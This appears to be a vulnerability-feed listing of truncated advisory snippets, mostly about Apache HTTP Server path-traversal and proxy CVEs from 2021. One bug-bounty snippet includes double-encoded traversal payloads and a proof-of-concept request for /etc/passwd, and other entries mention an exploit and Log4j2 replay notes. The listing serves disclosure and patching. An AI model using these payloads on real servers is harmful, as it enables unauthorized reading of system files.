[SECURITY] Fedora 34 Update: rust-tiny_http0.6-0.6.4-1.fc34
Low level HTTP server library...
[SECURITY] Fedora 34 Update: rust-tiny_http-0.8.2-1.fc34
Low level HTTP server library...
Exploit for Uncontrolled Resource Consumption in Siemens 6Bk1602-0Aa12-0Tp0_Firmware
Log4j2 Replay Notes, for learning purposes only Reference:...
[ASA-202112-12] grafana-agent: information disclosure
Arch Linux Security Advisory ASA-202112-12. Severity: High; Date: 2021-12-11; CVE-ID: CVE-2021-41090; Package: grafana-agent; Type: information disclosure; Remote: Yes; Link: https://security.archlinux.org/AVG-2614. Summary: The package grafana-agen...
Cisco Releases Security Advisory for Multiple Products Affected by Apache HTTP Server Vulnerabilities
Cisco has released a security advisory to address Cisco products affected by multiple vulnerabilities in Apache HTTP Server 2.4.48 and earlier releases. An unauthenticated remote attacker could exploit this vulnerability to take control of an affected system. CISA encourages users and...
Security Bulletin: Multiple vulnerabilities affect IBM HTTP Server (powered by Apache) for i
Summary IBM HTTP Server powered by Apache for i is vulnerable to the issues described in the vulnerability details section. IBM i has addressed the applicable CVEs in the Apache HTTP Server implementation. Vulnerability Details CVEID: CVE-2021-40438 DESCRIPTION: Apache HTTP Server is vulnerable t...
Why Everyone Needs to Take the Latest CISA Directive Seriously
Government agencies publish notices and directives all the time. Usually, these are only relevant to government departments, which means that nobody else really pays attention. It's easy to see why you would assume that a directive from CISA just doesn't relate to your organization. But, in the...
IBM HTTP Server Installed (Windows)
Binary data ibmhttpdwininstalled.nbin...
Active Exploitation of Apache HTTP Server CVE-2021-40438
CVE | Vendor Advisory | AttackerKB | IVM Content | Patching Urgency | Last Update
---|---|---|---|---|---
CVE-2021-40438 | Apache Advisory | AttackerKB | 09/16/2021 multiple | ASAP | December 1, 2021 14:00 ET

On September 16, 2021, Apache released version 2.4.49 of HTTP Server, which included a f...
Security Bulletin: Multiple vulnerabilities have been identified in WebSphere Application Server shipped with Cloud Pak System
Summary WebSphere Application Server is shipped as a component of IBM Cloud Pak System. Vulnerabilities have been identified in WebSphere Application Server. Information about security vulnerabilities affecting WebSphere Application Server have been published in security bulletins. Vulnerability...
Multiple Vulnerabilities in Apache HTTP Server Affecting Cisco Products: November 2021
On September 16, 2021, the Apache Software Foundation disclosed five vulnerabilities affecting the Apache HTTP Server httpd 2.4.48 and earlier releases. For a description of these vulnerabilities, see the Apache HTTP Server 2.4.49 section...
vulhub1
This is a repository for a project called Vulhub, which appears to be a collection of vulnerable systems and applications for testing and learning purposes. The repository contains various files and directories, including: 1. .gitattributes: A file that specifies which files should be ignored by...
Internet Bug Bounty: Path Traversal and Remote Code Execution in Apache HTTP Server 2.4.50
Hello Apache team, @fms and myself were able to bypass the latest patch for CVE 2021-41773 in the Apache 2.4.50. These are the payloads: 1 %%32%65%%32%65 2 .%%32%65 3 .%%32e 4 .%2%65 PoC Path Traversal GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1...
Security Bulletin: Vulnerabilities in IBM HTTP Server affect IBM Cloud Orchestrator and IBM Cloud Orchestrator Enterprise
Summary There are vulnerabilities in IBM HTTP Server used by IBM WebSphere Application Server. IBM WebSphere Application Server is shipped with IBM Cloud Orchestrator and IBM Cloud Orchestrator Enterprise. These issues were addressed by IBM WebSphere Application Server. Vulnerability Details Refe...
Apache HTTP Server 2.4.49 & 2.4.50 Path Traversal (CVE-2021-42013)
Binary data apache2450pathtraversal.nbin...
EulerOS Virtualization 2.9.1 : httpd (EulerOS-SA-2021-2746)
According to the versions of the httpd packages installed, the EulerOS Virtualization installation on the remote host is affected by the following vulnerabilities: - Apache HTTP Server versions 2.4.0 to 2.4.46 A specially crafted Digest nonce can cause a stack overflow in mod_auth_digest. There is...
EulerOS Virtualization 2.9.0 : httpd (EulerOS-SA-2021-2779)
According to the versions of the httpd packages installed, the EulerOS Virtualization installation on the remote host is affected by the following vulnerabilities: - Apache HTTP Server versions 2.4.0 to 2.4.46 A specially crafted Digest nonce can cause a stack overflow in mod_auth_digest. There is...
Oracle Linux 8 : httpd:2.4 (ELSA-2021-4257)
The remote Oracle Linux 8 host has packages installed that are affected by multiple vulnerabilities as referenced in the ELSA-2021-4257 advisory. - Add checks on the configured UDS path Orabug: 33412270 CVE-2021-40438 - Resolves: 1972500 - CVE-2021-30641 httpd:2.4/httpd: MergeSlashes regression -...
Huawei EulerOS: Security Advisory for httpd (EulerOS-SA-2021-2779)
The remote host is missing an update for the Huawei EulerOS...
httpd:2.4 security, bug fix, and enhancement update
httpd 2.4.37-41.0.1 - Add checks on the configured UDS path Orabug: 33412270 CVE-2021-40438 - Set vstring per ORACLESUPPORTPRODUCT Orabug: 29892262 - Replace index.html with Oracle's index page oracleindex.html 2.4.37-41 - Resolves: 1680111 - httpd sends reply to HTTPS GET using two TLS records -...